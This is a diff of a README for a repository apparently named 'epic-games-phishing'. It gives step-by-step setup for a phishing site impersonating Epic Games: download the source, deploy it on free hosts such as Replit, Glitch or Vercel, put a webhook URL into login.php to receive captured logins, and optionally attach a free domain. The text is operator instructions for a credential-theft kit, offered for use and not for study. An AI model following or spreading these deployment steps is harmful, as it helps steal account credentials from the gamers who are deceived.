dimondkingYT717/epic-games-phishing/README.md

 # ❓ - How to Setup ?
 1. Download the Source code
 2. Upload it on a host like Replit, Glitch, Vercel (Im using Replit)
 4. Go in `login.php`, and put your webhook url.
-You can enable ping too.
+(You can enable ping too)
-5.
+5. Then Your program is ready !
+(if you want to setup a free domain to your website, i recommend to use [Freenom](https://www.freenom.com))

+# ❓ - How to Use ?